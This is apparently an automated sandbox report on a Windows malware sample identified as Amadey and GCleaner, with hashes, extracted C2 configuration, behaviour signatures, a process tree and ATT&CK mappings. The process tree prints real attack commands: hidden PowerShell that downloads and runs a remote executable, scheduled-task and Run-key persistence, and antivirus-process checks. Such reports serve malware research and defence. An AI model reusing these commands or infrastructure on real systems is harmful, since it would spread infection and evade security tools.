Overview

overview

10

Static

static

5

2025-03-26...er.exe

windows7-x64

10

2025-03-26...er.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    132s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26/03/2025, 20:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-03-26_7f36eaec1b9d90d765a3ed4bc4d05757_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    7f36eaec1b9d90d765a3ed4bc4d05757

  • SHA1

    56ca4cf6a18ea8ad647946d30135eae3f85e83f1

  • SHA256

    1b5b2b683f5d9e921b58f57c77da6a0d02c71c341e73d59629a4bafda8d199bc

  • SHA512

    88575f18f0a6fe6f0543066124db338eac5db12d6d9a9f4c6fcbc98fa6265e917cf33eac0702fa6a645fe857e040c88db3137e6c3dd3f9a5caf2dd2bfc3be230

  • SSDEEP

    24576:0qDEvCTbMWu7rQYlBQcBiT6rprG8a03u:0TvC/MTQYxsWR7a03

Score
10/10
amadeygcleaner092155defense_evasiondiscoveryexecutionloaderpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 14 IoCs
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 38 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 6 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of FindShellTrayWindow 16 IoCs
  • Suspicious use of SendNotifyMessage 15 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\2025-03-26_7f36eaec1b9d90d765a3ed4bc4d05757_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
        "C:\Users\Admin\AppData\Local\Temp\2025-03-26_7f36eaec1b9d90d765a3ed4bc4d05757_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn LXHBAmaYGWF /tr "mshta C:\Users\Admin\AppData\Local\Temp\RHokV67mf.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2616
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn LXHBAmaYGWF /tr "mshta C:\Users\Admin\AppData\Local\Temp\RHokV67mf.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2712
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\RHokV67mf.hta
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'3KPLUAQXEFBQPO8RSIYCUGRPKKVNC55I.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2888
            • C:\Users\Admin\AppData\Local\Temp3KPLUAQXEFBQPO8RSIYCUGRPKKVNC55I.EXE
              "C:\Users\Admin\AppData\Local\Temp3KPLUAQXEFBQPO8RSIYCUGRPKKVNC55I.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:808
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1532
                • C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:844
                • C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343420101\kZZeUXM.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2248
                • C:\Users\Admin\AppData\Local\Temp\10343560101\592c9e7601.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343560101\592c9e7601.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:1048
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c schtasks /create /tn mCT1BmaiGHH /tr "mshta C:\Users\Admin\AppData\Local\Temp\jZ6Fez7dX.hta" /sc minute /mo 25 /ru "Admin" /f
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1480
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /tn mCT1BmaiGHH /tr "mshta C:\Users\Admin\AppData\Local\Temp\jZ6Fez7dX.hta" /sc minute /mo 25 /ru "Admin" /f
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1096
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta C:\Users\Admin\AppData\Local\Temp\jZ6Fez7dX.hta
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:1420
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UHW0YLSGVOWINEO3FDGOXHKOSTIDC7I8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      9⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Downloads MZ/PE file
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:932
                      • C:\Users\Admin\AppData\Local\TempUHW0YLSGVOWINEO3FDGOXHKOSTIDC7I8.EXE
                        "C:\Users\Admin\AppData\Local\TempUHW0YLSGVOWINEO3FDGOXHKOSTIDC7I8.EXE"
                        10⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:908
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\10343570121\am_no.cmd" "
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1524
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 2
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Delays execution with timeout.exe
                    PID:1028
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2924
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1188
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2120
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1576
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2364
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2376
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /tn "Q6m4DmaWTka" /tr "mshta \"C:\Temp\GSDdv6mEV.hta\"" /sc minute /mo 25 /ru "Admin" /f
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:748
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta "C:\Temp\GSDdv6mEV.hta"
                    8⤵
                    • Modifies Internet Explorer settings
                    PID:2192
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      9⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Downloads MZ/PE file
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2824
                      • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                        10⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2388
                • C:\Users\Admin\AppData\Local\Temp\10343630101\f91bf54e3f.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343630101\f91bf54e3f.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1032
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10343630101\f91bf54e3f.exe"
                    8⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2112
                • C:\Users\Admin\AppData\Local\Temp\10343640101\e9ddb3a424.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343640101\e9ddb3a424.exe"
                  7⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2212
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10343640101\e9ddb3a424.exe"
                    8⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    PID:2420
                • C:\Users\Admin\AppData\Local\Temp\10343650101\ac7f48816f.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343650101\ac7f48816f.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1812
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 1812 -s 64
                    8⤵
                    • Loads dropped DLL
                    PID:1576
                • C:\Users\Admin\AppData\Local\Temp\10343660101\oalJJxv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343660101\oalJJxv.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2376
                • C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2040
                • C:\Users\Admin\AppData\Local\Temp\10343680101\7IIl2eE.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343680101\7IIl2eE.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:2388
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:2188
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1816
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1420
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2716
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2664
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 418377
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2780
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Leon.cab
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1936
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "BEVERAGES" Compilation
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1232
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1368
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2828
                    • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                      Passwords.com N
                      9⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:268
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1572
                • C:\Users\Admin\AppData\Local\Temp\10343690101\TbV75ZR.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343690101\TbV75ZR.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:3068
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1480
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2800
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2768
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2844
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2828
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 267978
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:808
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Spanish.vss
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:940
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /V "East" Removed
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1136
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2460
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2620
                    • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                      Exam.com j
                      9⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:3052
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2204
                • C:\Users\Admin\AppData\Local\Temp\10343700101\f73ae_003.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343700101\f73ae_003.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1412
                • C:\Users\Admin\AppData\Local\Temp\10343710101\WLbfHbp.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343710101\WLbfHbp.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:1812
                  • C:\Windows\SysWOW64\CMD.exe
                    "C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat
                    8⤵
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1164
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3056
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr /I "opssvc wrsa"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1544
                    • C:\Windows\SysWOW64\tasklist.exe
                      tasklist
                      9⤵
                      • Enumerates processes with tasklist
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:952
                    • C:\Windows\SysWOW64\findstr.exe
                      findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1680
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c md 267978
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2548
                    • C:\Windows\SysWOW64\extrac32.exe
                      extrac32 /Y /E Spanish.vss
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2616
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:1700
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2768
                    • C:\Users\Admin\AppData\Local\Temp\267978\Exam.com
                      Exam.com j
                      9⤵
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:2688
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2136
                • C:\Users\Admin\AppData\Local\Temp\10343720101\dBSGwVB.exe
                  "C:\Users\Admin\AppData\Local\Temp\10343720101\dBSGwVB.exe"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:1968
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ""C:\Users\Public\Netstat\netsup.bat" "
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:3068
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                      9⤵
                        PID:2788
        • C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe
          "C:\Users\Admin\AppData\Local\Temp\10343670101\BIm18E9.exe"
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2908

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      Modify Registry

      2
      T1112

      Virtualization/Sandbox Evasion

      2
      T1497

      Credential Access

      Unsecured Credentials

      1
      T1552

      Credentials In Files

      1
      T1552.001

      Discovery

      Process Discovery

      1
      T1057

      Query Registry

      4
      T1012

      System Information Discovery

      2
      T1082

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      Virtualization/Sandbox Evasion

      2
      T1497

      Lateral Movement

      Collection

      Data from Local System

      1
      T1005

      Command and Control

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Temp\GSDdv6mEV.hta
        Filesize

        779B

        MD5

        39c8cd50176057af3728802964f92d49

        SHA1

        68fc10a10997d7ad00142fc0de393fe3500c8017

        SHA256

        f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

        SHA512

        cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\633SXO0D\soft[1]
        Filesize

        3.0MB

        MD5

        2cb4cdd698f1cbc9268d2c6bcd592077

        SHA1

        86e68f04bc99f21c9d6e32930c3709b371946165

        SHA256

        c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a

        SHA512

        606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QS2MOPHD\success[1].htm
        Filesize

        1B

        MD5

        cfcd208495d565ef66e7dff9f98764da

        SHA1

        b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

        SHA256

        5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

        SHA512

        31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\10343250101\oalJJxv.exe
        Filesize

        9.8MB

        MD5

        9a2147c4532f7fa643ab5792e3fe3d5c

        SHA1

        80244247bc0bc46884054db9c8ddbc6dee99b529

        SHA256

        3e8b13abf977519f8aa7ced613234a39ee1a39e07a2915c60c09713677ecdeba

        SHA512

        c4513062787175cc942cdb0324c1465957bf4d2c48d68a4896daeb427b936ae8d9c78b88f67c456566e8fc32787b1d8b92b3521f7e47e2e90b3f9e10d8498aba

        Download Submit

